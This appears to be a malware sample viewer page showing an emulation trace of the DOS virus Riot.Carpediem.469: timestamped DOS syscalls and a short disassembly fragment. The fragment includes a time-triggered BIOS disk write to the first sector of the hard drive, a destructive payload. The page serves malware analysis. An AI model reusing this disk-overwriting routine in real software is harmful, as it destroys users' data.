Sample viewer

vx.netlux.org/Virus.DOS.Riot.Carpediem.469

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:16:14.652382914Z 26 PC: 12a91 | Set disk transfer address
2018-12-17T22:16:14.654301447Z 25 PC: 12aa5 | Get default drive
2018-12-17T22:16:14.655269428Z 44 PC: 12b82 | Get time 0x12b82: cmp dl, 5
0x12b85: ja 0x12b9e
0x12b87: mov ax, 0x301
0x12b8a: mov cx, 1
0x12b8d: mov dx, 0x80
0x12b90: lea bx, word ptr [bp + 0x100]
0x12b94: int 0x13
0x12b96: mov ah, 9
0x12b98: lea dx, word ptr [bp + 0x284]
0x12b9c: int 0x21
0x12b9e: lea si, word ptr [bp + 0x2cd]
0x12ba2: mov di, 0x100
0x12ba5: movsw word ptr es:[di], word ptr [si]
0x12ba6: movsw word ptr es:[di], word ptr [si]
0x12ba7: lea dx, word ptr [bp + 0x301]
0x12bab: mov ah, 0x3b
0x12bad: int 0x21
0x12baf: mov bx, 0x100
0x12bb2: push bx
0x12bb3: xor ax, ax
2018-12-17T22:16:14.656760422Z 59 PC: 12baf | Change current directory